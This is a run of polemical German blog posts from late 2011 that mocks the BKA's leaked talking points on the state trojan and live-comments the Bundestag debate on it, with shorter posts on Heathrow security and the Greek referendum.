Wer das Scheiße findet und ein Aufnahmegerät und eine künstlerische Ader hat, sei dazu aufgerufen, hier mitzumachen. (Danke, Ben)

Sat Nov 5 2011

[l] Auf der Rückreise musste ich in Heathrow durch eine Sicherheitsschranke, und sah dabei, dass sie eine von den 8 Sicherheitsschranken kindgerecht machen wollten. Da waren dann so lustige Dinofiguren aufgeklebt auf die Plexiglaswände, und vor den Durchlauf-Metalldetektor hatten die einen Papier-Regenbogen geklebt. Ich hätte ja zu gerne ein Foto davon gemacht, aber durfte ich nicht, und die Supervisorin hatte auch kein Pressefoto zur Hand, das sie mir mitgeben konnte, betonte aber mehrfach, das sei nur ein Feldversuch, aber der käme bisher ganz gut an.
Vor dem Weitergehen hat mich dann erstmal der Zufallszahlengenerator für ein Drogenscreening meines Handgepäcks ausgewählt.
Ein Schelm, wer Böses dabei denkt.

Fri Nov 4 2011

[l] Wie kommt das eigentlich, dass das Griechenland-Referendum nicht funktioniert hat bei uns? Das ging ja gar nicht um Griechenland in meinen Augen, sondern war ein an sich brillant aussehender Schachzug, um die Deutschen dazu zu bringen, dass sie sich überlegen, hey, warte mal, DIE stimmen ab? Wieso stimmen WIR eigentlich nicht ab? Ist ja schließlich unser Geld!1!!
Aber irgendwie hat diesen Schritt hier so gut wie niemand gemacht gedanklich. Warum eigentlich nicht? Weil es eh alles alternativlos ist oder was? Das finde ich ziemlich erschütternd, dass in Deutschland nicht mal die Diskussion losging, warum wir eigentlich keine Volksabstimmung kriegen.
Update: Der Focus hat ein paar schöne Zitate zusammengetragen dazu.
Die Opposition bewertete die Vorstöße unter anderem des CSU-Generalsekretärs Alexander Dobrindt und des FDP-Finanzexperten Frank Schäffler als Populismus. Sie hatten gefordert, das Volk künftig über grundlegende europäischen Weichenstellung abstimmen zu lassen.
Oh, verstehe, Volksabstimmungen sind Populismus und daher abzulehnen. Eigentlich sollten wir mit dem gleichen Argument auch Wahlen ablehnen. Dem Volk Einfluß auf die Politik zu gewähren, das ist ja wohl purer Populismus!1!!
CSU-Landesgruppenchefin Gerda Hasselfeldt sagte der „Saarbrücker Zeitung“, Volksentscheide seien „kein Allheilmittel“. Entscheidungen ließen sich oft nicht auf ein Ja oder Nein herunterbrechen.
Da stellt sich mir ja die Frage, in welchem Parlament die gute Frau Hasselfeldt so abstimmt, wenn die da nicht mit Ja/Nein abstimmen. Und: wie stimmen die da sonst ab? Ja/Nein/Vielleicht/Weißnicht/CowboyNeal?
Der Parlamentarische Geschäftsführer der Unions-Fraktion, Peter Altmaier (CDU), fügte in dem Blatt hinzu, er halte in der derzeitigen „hochkomplexen und instabilen Lage isolierte Volksentscheide in einer Vielzahl von EU-Staaten für falsch und gefährlich“.
Mit anderen Worten: das Volk ist zu dämlich, wir sollten sie höchstens dann fragen, wenn sie nichts kaputtmachen können. Die Theorie war immer sehr populär, bis sich herausstellte, dass Politiker im Allgemeinen noch schlechter informiert sind als das Volk und im Normalfall auch unbelastet von Sachkenntnis oder Detailwissen abstimmen.

Thu Oct 20 2011

[l] Mir hat gerade ein Vögelchen Zierckes Talking Points zugespielt, und bevor ich klären konnte, ob ich das veröffentlichen kann oder nicht, sehe ich, dass die Kollegen von Netzpolitik.org das schon getan haben. Sehr schön! *händereib* *ärmelhochkrempel*
Also was schreibt er denn da so.
Das BKA hat keinen Verfassungsbruch begangen!
Das wird sich zeigen.
In unsere OLD- und Quellen-TKÜ-Software war zu keinem Zeitpunkt eine rechtswidrige Hintertür zum Aufspielen von Ausspähprogrammen eingebaut.
Das klingt gut, leider wird es noch im selben Dokument auf Seite 7 der Lüge überführt:
Update selbst wird mit der Updatefunktionalität der Digitask-Aufzeichnungseinheit durchgeführt (Updates werden protokolliert)
Das mit dem Protokoll klingt gut, aber leider ist ein Protokoll auf Seiten des Trojaners wertlos, weil es von Dritten manipuliert werden kann, und ein Protokoll auf Seiten des BKA ist auch wertlos, weil über die Schnittstelle auch von Dritten weitere Malware hochgeladen worden sein kann, ohne dass das überhaupt beim BKA vorbeikommt.
Es gibt keinen Zugriff von Dritten auf die Software des BKA.
Da bin gespannt auf Ihre Beweisführung, Herr Ziercke!
Die Planung, Durchführung und Nachbereitung von Quellen-TKÜ und Online-Durchsuchung folgen einem detaillierten Phasenkonzept, einschließlich ausdifferenzierter Prüf- und Kontrollmechanismen.
Bei dem Satz muss jemand den Inhalt mitzuübertragen vergessen haben. Hier ist jedenfalls keiner angekommen. Auch die ganze Seite 4 ist reiner "Beweis durch Behauptung"-Kinderkram. Damit können sie vielleicht jemanden wie den Uhl überzeugen, aber sonst niemanden. Kein Wunder, dass sie das hinter verschlossenen Türen vor ausgesuchtem Publikum gehalten haben. Sonst wären sie ja aus dem Saal gelacht worden damit.
Dann machen sie noch die Ansage, dass sie in Amtshilfe für Rheinland-Pfalz und Hessen Trojaner verteilt haben. Sehr schön!
Desweiteren verweisen sie auf ihre ISO 9000ff-Zertifizierung (HAHAHAHA, Snake Oil zum Quadrat, das lässt ja tief blicken, dass sie DAS als Beleg für ihre Integrität nehmen!) und ein Phasenkonzept. Wer schonmal in einer WG gewohnt hat, mit Konzept zum gemeinschaftlichen Geschirrspülen und Müllrunterbringen, der wird das ähnlich erheiternd finden wie ich jetzt. Sie zitieren da ab Seite 6 das Phasenmodell. Ich kann das nicht mal pasten hier, ich hab vom Fremdschämen Rheuma gekriegt und kann die Maus nicht mehr schieben. AU DIE SCHMERZEN! Das einzige, was man da mitnehmen kann, ist dass es einen Amtsleitungsvorbehalt gibt. D.h. die Amtsleitung steht jetzt persönlich mit einem Bein im Knast und kann das nicht mehr auf inkompetente Angestellte abwälzen.
Schließlich kommen dann auch noch die Ausflüchte zu dem Proxy, bzw. kommen sie gerade nicht. Da steht nur:
zur Verschleierung der Q-TKÜ gegenüber dem Tatverdächtigen wird die gesamte Kommunikation der Software über mindestens zwei Proxy Server geleitet
Ein Schelm, wer böses dabei denkt.
auf diesen Proxy Servern werden keinerlei Daten abgelegt, sondern lediglich eine Durchleitung - über nicht-deutsche Server – vorgenommen
Ach sooo! Das ist nur eine Durchleitung! Na dann kann da ja nichts passieren. Immerhin: Sie geben zu, dass sie durch das Ausland routen. Das macht aber nichts (Seite 11), weil:
Richtig ist vielmehr, das die Daten über einen ausländischen Server lediglich verschlüsselt weitergeleitet und nicht auf dem ausländischen System gespeichert werden.
Ich bewundere deren Chuzpe, ihre Pfusch-Verschleierung als "Verschlüsselung" zu bezeichnen. Oh und die scheinen noch nicht verstanden zu haben, dass man mit einem Proxy auch durchfließende Daten manipulieren kann.
Ein schöner Lacher ist noch die "Beendigungsphase":
- Überwachungssoftware wird möglichst im Rahmen operativer Maßnahmen physikalisch gelöscht
- sofern mangels Zugriff auf das überwachte System physikalisches Löschen nicht realisierbar, wird auf die eingebaute Löschfunktion zurückgegriffen
- bei letztgenannter Alternative (sogen. Fernlöschung) besteht ein Restrisiko, dass die Software oder Teile davon zu einem späteren Zeitpunkt mit forensischen Methoden durch Dritte analysiert werden
No shit, Sherlock! Mit forensischen Methoden durch Dritte analysiert, ja? *schenkelklopf*
Die nächste Frage, die sich stellt, ist was es mit der "revisionssicheren Dokumentation" zu tun hat, die gestern alle CDU-Tontauben nachgebetet haben.
- Sämtliche durchgeführten Aktionen (Updates, Modulaktivierungen und -deaktivierungen) werden protokolliert.
- Des Weiteren sind dort alle gewonnenen Daten (Gespräche, Chatnachrichten, übertragene Dateien) auswertbar vorhanden.
Das ist nicht gut, weil "alle gewonnenen Daten" auch den Kernbereich der privaten Lebensgestaltung betrifft und nach Vorgabe des Bundesverfassungsgerichts solche Daten sofort gelöscht werden müssen. Und überhaupt stellt sich natürlich die Frage, was auf ein Protokoll zu geben ist, dass im Fall eines Manipulationsvorwurfes vom Angeklagten selber geführt wurde. Ich sage: gar nichts. Da müsste man schon besondere Maßnahmen ergreifen, um eine Manipulation besonders schwer zu machen, z.B. per Read-Only-Ausleitung der Logdaten in einen physisch separaten Logging-Bereich, bei dem nur hinten angefügt und nichts gelöscht oder überschrieben werden kann nachträglich. Was das BKA aber darunter versteht:
- Das systemtechnische Protokoll ist aus der Bedienoberfläche heraus nicht manipulierbar.
Die operativen Worte hier sind "aus der Bedienoberfläche heraus". Wenn jemand weiß, wie man es außerhalb der Bedienoberfläche manipuliert, ist das Scheunentor offensichtlich offen. Daher dementiert das BKA auch gleich so doll sie können (ein lauer Windhauch würde diese Argumentation wegwehen):
- Löschen von Protokolldaten wäre nur mit administrativem Zugang (nicht der Ermittlungsbeamte, nur der Techniker hat Zugang) auf die zugrundeliegende Datenbank und entsprechendem technischen Aufwand bei gleichzeitiger krimineller Energie möglich. Dafür gibt es keinem Fall auch nur die Spur eines Verdachts!
ACH, für das BKA soll die Unschuldsvermutung gelten, wenn sie mit thermonuklearen Trojanern herumhantieren? Aber umgekehrt dürfen unsere Behörden uns trojanisieren, selbst wenn wir nachweislich überhaupt nichts angestellt haben, unter der Maßgabe der Gefahrenabwehr? Im Übrigen ist das mit dem administrativen Zugang nicht glaubwürdig. Wenn das GUI ohne Admin-Zugang in die Datenbank schreiben kann, dann kann das auch der Benutzer des GUIs. Er muss sich nur die Zugangsdaten für die Datenbank aus dem GUI rauspopeln.
Und ob das BKA kriminelle Energie hat, das ist ja wohl eine Frage des Blickwinkels. Die wollen Trojaner bei den Bürgern installieren! Wenn die Russen das tun, nennt man das "Mafia" und "organisierte Kriminalität" und die Politik nimmt es als Anlass, um noch mehr Trojanereinsätze zu begründen!
Aber hey, ist ja noch nicht fertig. Hier ist noch ein echtes Highlight:
Falsch ist, dass das BKA eine Überwachungssoftware verwendet, die mit einer unsicheren symmetrischen Verschlüsselung arbeitet und nur in eine Kommunikationsrichtung verschlüsselt. Wir verschlüsseln in beide Richtungen!
HAHAHAHAHAHAHA, das alleine ist ja schon so ein Brüller, ich lach mich kaputt. Wir verschlüsseln in beide Richtungen mit einem unsicheren symmetrischen Cipher!1!!
Richtig ist, dass ein gemeinsamer Schlüssel zwischen Software und Einsatzservern vergeben wird. Dies dient der Verschlüsselung und der Authentifizierung.
OH DIE SCHMERZEN! Sie bestätigen also direkt, was sie im Absatz davor noch dementiert haben. Gut, mit einem symmetrischen Schlüssel kann man sich nicht authentisieren, das weiß schon jeder Informatik-Studienabbrecher, das meinen die bestimmt nicht ernst? Doch, meinen sie!
Der Kommunikationspartner kann sich ohne diesen Schlüssel nicht als gültiger Partner ausgeben.
Liebes BKA. IHR LIEFERT DEN SCHLÜSSEL AUS. Der ist im Trojaner drin. Der ist nicht geheim. Und man kann mit ihm nichts authentisieren. Fragt doch mal eure Krypto-Kollegen vom BSI, die haben dem Vernehmen nach Reste von Krypto-Knowhow am Start. Wenn die nicht alle schon dem Herzinfarkt erlegen sind angesichts eurer haarsträubenden Äußerungen hier, dann werden sie euch zumindest bestätigen, wie tief euer Unwissen hier reicht. "Wir haben da auch Experten", dass ich nicht lache. Gut, helfen werden euch die BSIler nicht, das haben sie ja schon angesagt. Aber euch ist ja eh nicht zu helfen.
Weiter im Text. Es fehlt ja noch der Teil, wo sie den CCC als die Bösen hinstellen. Hier ist er:
Seit der Veröffentlichung der Signatur der Verschlüsselung durch den CCC könnten noch laufende Maßnahmen entdeckt werden. Das BKA hat daher in einem aktuellen Verfahren der organisierten Rauschgiftkriminalität die Maßnahme sofort abgebrochen und dies der Staatsanwaltschaft und dem anordnenden Gericht mitgeteilt. Dies ist auch den Bundesländern mitgeteilt worden.
ORGANISIERTE RAUSCHGIFTKRIMINALITÄT!!1! Mit anderen Worten: noch eine Online-Apotheke.
Oh, eine Sache möchte ich schon noch ansprechen:
Die Quellen-TKÜ-Software ist auf das Zielsystem und die dort installierte Skypeversion ausgerichtet. Bei einem Skypeupdate muss daher auch die Quellen-TKÜ-Software angepasst werden, da ansonsten die Kommunikation nicht mehr aufgezeichnet wird.
Das klingt für mich nach Unsinn. Ich behaupte, dass das auch ohne Updates geht.
Das BKA behauptet weiterhin, das Verfassungsgericht habe nicht gesagt, ein Mehr an Funktionalität sei generell verboten, sondern nur dann,
wenn – und darauf kommt es dem BVerfG an - die durch eine Nachladefunktion eingesetzte Software zum Ausspähen von weiteren Daten genutzt würde.
Hier ist, was das Verfassungsgericht tatsächlich urteilte:
Art. 10 Abs. 1 GG ist hingegen der alleinige grundrechtliche Maßstab für die Beurteilung einer Ermächtigung zu einer „Quellen-Telekommunikationsüberwachung“, wenn sich die Überwachung ausschließlich auf Daten aus einem laufenden Telekommunikationsvorgang beschränkt. Dies muss durch technische Vorkehrungen und rechtliche Vorgaben sichergestellt sein.
Es geht also nicht darum, ob die nachgeladene Software tatsächlich benutzt wird, um mehr abzuhören, sondern es müssen technische und rechtliche Vorkehrungen da sein, um zu verhindern, dass das geschehen kann. Das ist hier nicht der Fall, daher handelt es sich um eine klare Verletzung des Urteils.
Gegen eine bloße Aktualisierungsfunktion kann das BVerfG keine Einwände haben, weil sonst die Maßnahme an sich gefährdet wäre.
Den Typen, der diese Argumentation gemacht hat, würde ich gerne hinter Gittern sehen. "Ich MUSSTE den Laden ausrauben, Euer Ehren, denn mir ist ja Fahrradfahren erlaubt, und wenn ich denen nicht ein Fahrrad gestohlen hätte, dann wäre ja die Fahrradfahr-Maßnahme an sich gefährdet gewesen!1!!" Dass solche Leute überhaupt frei rum laufen können, irritiert mich maßlos, aber dass sie auch noch für Bundesbehörden der Exekutive Statements formulieren, das schlägt dem Fass den Boden aus. Wenn ihr es unter den Vorgaben nicht hinkriegt, DANN KÖNNT IHR ES HALT NICHT MACHEN. Ganz einfach!
Immerhin sehen sie auch selber ein, dass ihre Beweise da wertlos sind, und weil sie keine tatsächliche Überprüfung machen können, …
Das BKA hat am 11./12.10.2011 alle Protokolle bisheriger Quellen-TKÜ-Maßnahmen mit der DigiTask-Aufzeichnungseinheit unter Beteiligung der Beauftragten für den Datenschutz sowie für die IT-Sicherheit im BKA auf Plausibilität kontrolliert hat.
Äh, auf … Plausibilität?! So Pi mal Daumen oder wie? Geschaut, dass keine Logeinträge von Freitag nachmittag kommen, weil da die Beamten auf dem Heimweg sind? Oder wie habe ich mir das vorzustellen? Wenig überraschend haben sie nichts gefunden:
Im Ergebnis konnten keine Hinweise festgestellt werden, dass im BKA eine Software eingesetzt wird, die über die rechtlich zulässigen Grenzen der Quellen-TKÜ hinausgeht und dass im Rahmen der bisher erfolgreich durchgeführten Quellen-TKÜ-Maßnahmen unzulässige Daten ausgeleitet werden.
Natürlich nicht. Anhand einer "Plausibilitätsprüfung" der Logdateien kann man sowas ja auch nicht beurteilen.
Auf Seite 11 gibt es dann noch die Ausrede, wieso der Proxy in den USA steht. Achtung: fest sitzen bei der Lektüre:
Der Grund für diese Verschleierung ist kriminalistischer Natur. Skype selbst nimmt beim Start automatisch Kontakt mit einem Server in den USA auf. Für den versierten User sollte durch die Quellen-TKÜ- Software kein anderer Eindruck entstehen.
m(
Halt, einen hab ich noch. Wie das BKA prüft. Ihr sitzt hoffentlich weiterhin fest:
Das BKA testet die bestellte Software mit Hilfe eines sogen. Positivtests, der der Funktionalitäten der Software und die Reaktion der vom Zielsystem eingesetzten Sicherheitssoftware (Virenscanner, Firewall) prüft. Die Maßnahme wird als einsatzfähig betrachtet, wenn die bestellten Funktionalitäten vorhanden sind, und die Sicherheitssoftware keine Warnungen produziert.
Selbstverständlich sind so keinerlei Aussagen über eventuell zusätzlich vorhandene Funktionalität treffbar.
Update: Oh und natürlich ist der Paragraph mit den abgebrochenen Einsätzen auch gleichzeitig das Eingeständnis, dass ihre angeblich ganz andere Version des Trojaners das selbe schlechte Protokoll einsetzt und damit so verschieden nicht sein kann.
Update: Weil ich jetzt mehrfach darum gebeten wurde, hier nochmal explizit die letzte Zeile aus dem PDF:
Glauben Sie mir, meine Mitarbeiter verstehen das nicht!
Daran zweifelten wir auch keine Sekunde, Herr Ziercke!

Wed Oct 19 2011

[l] Die aktuelle Stunde geht gerade los, gleicher Stream wie vorhin. Das muss aber jemand anderes covern, ich krieg gerade Brechreiz von der aufgetürmten Unehrlichkeit. Nicht nur haben sie keinen einzigen Minister am Start (denn aus Sicht der Bundesregierung ist das ja offensichtlich keine Staatskrise sondern nur eine Bagatelle), es redet auch wieder dieser leere Konfirmandenanzug Ole Schröder.
Und legt gleich mit dreisten Lügen los, wie dass es nur um Terrorismus und organisierte Kriminalität ginge, nicht um Allerweltskriminalität (wie eine Online-Apotheke oder gestohlene Kinderkleidung, ja?). Wi-derlich.
"Wo Quellen-TKÜ dransteht, darf keine Online-Durchsuchung drinstehen, meine Damen und Herren!"
Immerhin gibt es ordentlich schlechtgelaunte Zwischenrufe.
"… ist es auch nicht möglich, Schadmodule nachzuladen, weil das bemerkt werden würde."
"Der Trojaner, den der CCC betrachtet hat, ist ja drei Jahre alt. Und drei Jahre sind in der IT ja eine lange Zeit." Schade nur, dass das ehemalige Nachrichtenmagazin gerade einen Trojaner von 2010 covert. Hups.
Und jetzt fordert er auch noch die Unschuldsvermutung für das BKA. "Das sind Unterstellungen, die durch nichts belegt sind. Das sind Vermutungen, die durch nichts belegt sind." Ja, so gut wie keine Belege, außer vielleicht die CCC-Analyse. Aber ansonsten nichts, also so gut wie. Fast gar nichts. Gut, die Antivirenhersteller haben die CCC-Analyse bestätigt, aber das zählt ja nicht weiter.
Jetzt argumentiert er mit dem Verhältnismäßigkeitsprinzip und vergleicht den Trojaner mit Dienstwaffen der Polizei. Was für eine Farce. Die Einrufe werden immer lauter. Der Brüller!
Jetzt ist der Oppermann für die SPD am Start und beginnt erstmal mit einem Lob für den CCC. "Aber der CCC hat auch chaotische Zustände in der Bundesregierung aufgedeckt" *Applaus* Dann zählt er die Widersprüche in den Aussagen der Minister auf. *Popcorn!* Vor allem natürlich bei dem Friedrich. Kein Wunder, dass sie den nicht hingeschickt haben da.
Und dann geht es los mit dem alten SPD-Programm: "Wir sagen: Wenn schon Staatstrojaner, dann vom Staat"
Burkhard Hirsch ist da, die Justizministerin offenbar auch (wurde gerade persönlich angesprochen, ich sah sie noch nicht).
Jetzt fordert die SPD, die Trojaner zu optimieren, die müssen doch nicht einmal pro Behörde angeschafft werden, reicht doch einmal!1!! Na super, genau was wir jetzt brauchen, die ökonomischen Aspekte waren ja auch völlig unterberichtet bislang, dabei stehen die doch so im Zentrum!
Oh Mann, zwischendurch kommt rein, dass die politische Geschäftsführerin der Piraten die Debatte "ermüdend" findet und weggezappt hat. Oh und Autogrammkarten haben auch eine höhere Priorität. OMFG.
Die FDP ist dran und nutzt die Gelegenheit, um die gesamte Trojaneraufdeckung vollständig als ihre Leistung darzustellen. Wi-der-lich. Immerhin sagen sie an, dass die SPD mal die Schnauze halten soll, weil sie den Trojaner ja eingeführt haben. "Es bringt uns nicht voran, den CCC zu chaotisieren oder zu heroisieren". Denn eigentlich war das ja alles Leistung der FDP!1!! Hat den Liberalen noch keiner mitgeteilt, dass sie a) unter 5% sind und b) Eigenlob stinkt? Mann ist das abstoßend. Bisher einziger inhaltlicher Punkt ist, dass sie erschüttert ist, dass das BKA den Quellcode nicht hatte. (Über "grundrechtsschonendere" Methoden des Abhörens) "Wenn das in Asien geht, und ich meine jetzt ausdrücklich nicht China, …" *stöhn*
Jetzt ist Jan Korte von den Linken und lobt den CCC und die FAZ, das gab es bestimmt auch noch nie :-) Deutlicher Kontrast zum Gefasel der FDP. Er weist darauf hin, dass das BKA im Innenausschuss nicht garantieren wollte, dass ihr Trojaner nicht auch mehr kann. "Und das behindert den aufrechten Gang, wenn man nicht weiß, was Sie mitlesen wollen". Schön formuliert. "Die FDP hat nächste Woche die Möglichkeit, einem Antrag der Linken zuzustimmen, die BKA-Befugnisse zurückzudrehen" *schenkelklopf*
Ah jetzt war die Leutheusser-Schnarrenberger kurz im Bild. Ob die auch noch was sagen will? Der Korte gefällt mir jedenfalls, der hat da schön empört auf den Tisch gekloppt.
Ah, jetzt der von Notz von den Grünen. Beklagt sich über die Relativierung der Grundrechte und dass Vertrauen der Bevölkerung in die Bundesregierung verloren geht.
(Nochmal zu den Piraten: vielleicht solltet ihr das mit der Transparenz nochmal überdenken?)
Hmm, der Notz ist mir irgendwie nicht konkret und nicht empört genug. Das wirkt wie eine dieser "Business as Usual" Bashing-Reden im Bundestag, weil man halt in der Opposition ist. Ist ja schön und gut, dass die sich alle widersprochen haben, aber die Zeit hätte man besser nutzen können. Hahaha, ein lustiger Satz war doch (über den CCC) "sonst würdigen Sie ja das Ehrenamt immer, der CCC arbeitet doch ehrenamtlich!" Ah, jetzt kommt das Fleisch. Die Mehrheit der Bürger lehnt den Trojaner ab. Die Mehrheit lehnt auch die Vorratsdatenspeicherung ab. Gut! "Auch Sie müssen einsehen, dass im Netz die Grundrechte voll gelten" (mit anderen Worten: das Internet darf kein rechtsfreier Raum sein!)
Oh Graus, jetzt der Uhl. Und der greift erstmal bis zur Schulter ins Klo und wirft dem Korte von den Linken vor, dass er gegen den Überwachungsstaat wettert (weil ja die Linken, und die SED, ihr wisst schon, gut, der Korte ist ein bisserl jung dafür, aber hey!).
Jetzt versucht er die Kleidungs-Terroristen aus Bayern als große Gefahr darzustellen und bringt "Wer sich ins Internet begibt, der kommt halt um? Ist das Ihre Position?" Und in Ermangelung inhaltlicher Argumente zitiert er den Ziercke indirekt und weist darauf hin, dass der Ziercke ja SPD-Mitglied sei. Der hat noch nicht mitgekriegt, dass die SPD politisch auch keine Rolle mehr spielt.
Wird immer besser. Das ist ja alles kalter Kaffee, weil der Computer Club, der hat ja NICHTS aufgedeckt, der Fall ist ja schon vom April, und da ist ja schon alles aufgeklärt, und im Übrigen klären wir jetzt ALLES auf, der Schaar hat mir das gesagt, und das reichen wir rum, wir wissen ja noch nicht, was da rauskommt. Nicht gänzlich widerspruchsfrei, seine Argumentation :-)
"Das wäre ja sehr schade, wenn unser Land am Ende regiert würde von Piraten und Chaoten aus dem Computerclub." Stattdessen lieber Leute, die sich an Recht und Gesetz halten, wie … die CSU!1!! *schenkelklopf*
Als nächstes der Klingbeil von der SPD, der direkt ins Klo greift und vom Bundestrojaner spricht, den der CCC untersucht hat (Hint: Staatstrojaner!). Man könnte fast denken, die haben sich alle abgesprochen, damit da gleich mal wieder einer widersprechen kann, und dann glaubt die Öffentlichkeit weiter, dass da Details kontrovers seien.
Kloppt auch auf die Widersprüche von dem Friedrich ein, und dass der die Nachladefunktion verteidigt hat. Sagt, die einzigen Chaoten hier gerade sei die Bundesregierung, dankt dem CCC. Spricht von der Offenbarung eines Kontrollverlusts der Bundesregierung. Der hat wohl auch den Schirrmacher gelesen heute. Wünscht sich, dass in der CDU mehr Leute Altmaier als Uhl lesen. Naja, hat mich nicht vom Hocker gehauen. Der braucht einen dynamischeren Redenstil.
Oh jetzt die Schnarrenberger! "Es darf keine Online-Durchsuchung in eine Quellen-TKÜ übergehen!" Klingt schön empört, aber bringt dann so Allgemeinplätze. Die Frau ist halt ein Polit-Profi. Hoffentlich bringt sie auch noch echte Klopper. "Wir müssen jetzt aufklären!" Ja, äh, na dann machen Sie doch mal! Worauf warten Sie denn? "Da müssen harte Grenzen gezogen werden! Und da müssen auch Manipulationsmöglichkeiten ausgeschlossen sein!" Hört, hört! Was Sie nicht sagen! "Und wir können das doch alles gar nicht sagen!" (Kontext: wir Politiker verstehen die Technik eh nicht richtig)
Haut auch in die Kerbe, dass der Trojaner vom Staat programmiert werden sollte. Nur die Linken trauen sich, Trojaner ganz abzulehnen. Beschämend. Die Schnarrenberger hat jetzt 10 Minuten flammend gepredigt und die einzige inhaltliche Aussage war, dass der Trojaner doch bitte vom Staat selber programmiert werden sollte. Als ob das was helfen würde! Was für eine Nebelkerze.
Jetzt die Frau Jelpke von den Linken, dankt auch dem CCC, und spricht dann von "kleinkriminellen Anabolika-Händlern" als Trojaner-Opfern. Die macht das nicht schlecht, könnte aber auch noch ein bisschen dynamischer reden. Und sie spricht auch endlich mal ein paar konkrete Dinge an, haut auf die Nachladefunktion drauf, die "Aktualisierung" als Ausrede, beklagt das Rumgewiesel und Rumgemauschel und Ausweichen bei konkreten Nachfragen. Weist darauf hin, dass das ein langjähriger Trend ist mit den Sicherheitsgesetzen.
Jetzt der Beck, der eröffnet gleich mit einem großartigen Hieb auf den Uhl und sein "im Internet kommt man halt um" Gefasel, meint er soll sich doch nochmal ein aktuelleres Internet ausdrucken lassen in seinem Büro :-) Wun-der-bar. "Das Tragische an dieser Debatte ist doch: nicht eine Kontrollbehörde hat herausgefunden, dass da was falsch läuft! Der Chaos Computer Club hat das gemacht!" *strike*
"Wir haben hier ein Problem! Das Problem heißt: wer überwacht die Überwacher und die Überwachungssoftware?" Fordert auch, dass der Staat das selbst macht, und zusätzlich eine Kontrolle durch unabhängige Stellen.
Schade, dass die Grünen sich nicht trauen, da Trojaner komplett abzulehnen. Ich sehe schon einen Trojaner-TÜV vor uns. Na super.
Weist darauf hin, dass die Regierung die selben lahmen Ausreden bringt wie die Bayern. "Das ist doch eine glatte Lüge!" Jawoll! So macht man politische Reden, sehr schön. Der Mann rockt. "Wenn der Staat sowas sagt, dann glaube ich als Bürger doch erstmal gar nichts mehr, was nicht unabhängig überprüft worden ist!" *strike*
Oh und jetzt zweifelt er an, dass man überhaupt eine Quellen-TKÜ durchführen darf. Sehr schön! Sagt, dass das gar nicht rechtens ist, zitiert das Urteil, verweist auf die Strafprozessordnung. Sehr gut! Weist die Schnarrenberger darauf hin, dass sie mehr Applaus von der Opposition gekriegt hat als von den Regierungsparteien, "ich hoffe Sie haben verstanden, wo in dieser Angelegenheit Ihre Bündnispartner sind".
Jetzt kommt der Binninger von der CDU, da spar ich mir mal die Zusammenfassung. Ih ist der unsympathisch. Beschwert sich, dass der CCC nicht "Bayern" drangeschrieben hat, dann wäre ja die Diskussion ja vielleicht sachlicher gewesen, und im Übrigen war das ja schwere Kriminalität, weil es ja Haftstrafen gab. Ich glaube die CDU hat überhaupt nur die drei Talking Points, durch die die da immer durchrotieren. Jetzt kommt wieder ein "wir brauchen aber die Quellen-TKÜ!1!!" *göbel* Oh die Schmerzen, ich halt's nicht aus! Oh und ihre Inkompetenz in Technikfragen ist gottgegeben, das ist halt so, Technik versteht ja eh keiner mehr, das muss so. Restunsicherheit und so. Wie bei Atomkraft!1!! Lasst uns ein neues Service- und Kompetenzzentrum schaffen! *schenkelklopf*
So, jetzt Hofmann von der SPD. "Die Exekutive hat immer gemauert! Wir hätten [immer noch] keine Erkenntnisse, wenn wir den CCC nicht hätten". Zu den Vorschlägen der CDU: "Ich denke, das sind Sachen, die wir auch vor zwei Jahren schon hätten machen können"
"Die Union ist mit ihren Sicherheitsgesetzen zur Gefahr für Sicherheit und Freiheit geworden". Sehr schön!
"Wenn der Uhl immer von Grauzone redet, dann weiß ich, der mein Rechtsbruch, also sag ich auch Rechtsbruch" :-)
"… nichts anderes gemacht als eine Online-Durchsuchung durch die rechtliche Hintertür." *strike*
[zu Friedrich] "Ich habe den Eindruck, der weiß nicht, wovon er spricht"
"Es ist doch klar, wenn man so eine Quellen-TKÜ nicht umsetzen kann ohne solche Grundrechtsverletzungen, dann kann man sie halt gar nicht machen!"
Der Mann ist mir noch nie aufgefallen, aber die Rede da gerade, die rockt.
"Diese Regierung ist ein Sicherheitsrisiko"
Zur Schnarrenberger: "Wenn Sie diese Rede vor zwei Jahren gehalten hätten und dann auch so gehandelt hätten, dann hätte ich auch geklatscht".
Jetzt kommt Jimmy Schulz von der FDP und grüßt die Zuschauer an den Empfangsgeräten, erwähnt den Begriff "Hashtag". Betont, dass er schon immer davor gewarnt hat, dass der Trojaner mehr können würde, nennt die Nachladefunktion "perfide", erklärt dass man darüber auch andere Dinge als Updates machen kann. Weist darauf hin, dass Trojaner-Erkenntnisse keine Beweiskraft haben. Whoa, spricht von Generalschlüssel und "Man in the Middle Attack". Der ist ja gut gebrieft! :-)
Oh und er weist darauf hin, dass man auch bei Skype direkt abschnorcheln kann. "Wenn so ein Trojanereinsatz nicht grundgesetzkonform gemacht werden kann, wieso tun wir es dann?" Wow! Und jetzt hat er gefordert, generell auf Trojaner zu verzichten! Ich bin beeindruckt! Das ist ja mal eine Überraschung.
Jetzt Edathy von der SPD. Schlägt vor, dass die Bundesregierung miteinander redet, um sich nach außen hin nicht so häufig zu widersprechen. Finde ich gar nicht, das war doch tolles Popcornkino!
Meint, die Interviewerin im Radio sei besser informiert gewesen als der Friedrich. "Ich finde, so einen Verlegenheitsinnenminister hat die Republik nicht verdient." YES!!! Fordert, dass Sicherheit nicht nur gelegentlich mal der Freiheit untergeordnet wird, sondern immer. "Sicherheit kann ich auch in Nordkorea haben". DER ist ja gut drauf heute!
Gelegentlich ist der Ole Schröder noch im Bild, wie er auf der Bank sitzt und twittert. m(
Schade, dass die SPD in der Regierung für die Einführung des Trojaners verantwortlich war. Sonst wäre das jetzt ein echt großartiger Beitrag gewesen.
Huch, jetzt kommt da ein Hinterbänkler (beachtet auch die Sektion "Plagiatsverdacht") von der CDU. Die haben wohl niemanden gefunden, der sich dahinterstellt. Ob das jetzt die CDU-"Netzpolitiker"-Simulation ist? Spricht von "ich habe auf Facebook eine Anfrage gekriegt". Oh Gott ist der gruselig. Da müssen sie aber echt weit nach hinten gegangen sein, bevor jemand den Vorteil durch Selbstdarstellung höher bewertet hat als die Nachteile durch um-Kopf-und-Kragen-reden. "Wir reden von Einzelfällen!" Au weia, wenn das die neue Netzpolitikabteilung der CDU ist, dann stehen die schlechter da als vorher. Der hat gerade ernsthaft dem CCC Strafvereitelung vorgeworfen. Hoffentlich ist der kein Jurist, sonst hat er gerade auch unter Kollegen seinen Ruf ruiniert (hier nochmal von einem Juristen bestätigt).
